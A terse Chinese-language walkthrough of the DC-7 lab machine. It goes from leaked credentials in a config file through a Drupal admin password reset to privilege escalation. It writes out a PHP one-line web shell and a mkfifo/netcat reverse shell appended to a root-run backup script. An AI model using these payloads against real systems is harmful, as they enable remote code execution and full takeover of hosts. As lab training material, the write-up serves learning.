dc-7
确定目标主机地址
扫描端口
开放80端口,访问
浏览器搜索@dc7user
打开第一个网页,打开员工数据库,打开config.php文件得到账号密码
ssh连接
查看邮件
查看可执行文件
发现脚本文件中drush命令可以更改密码,进入/var/www/html目录下更改
drush user-password admin --password="123456"
更改密码后登录web站点
添加新模块
输入url后install
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
安装完成
编辑dc-7
写入一句话木马
GetShell
<?php
@eval($_REQUEST[666]);
?>
蚁剑连接之后,打开终端
查看可利用文件
查找,在/opt/scripts目录下
进入目录写入反弹shll代码,kali端监听
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.110.11 8888 >/tmp/f” >> backups.sh
提权成功!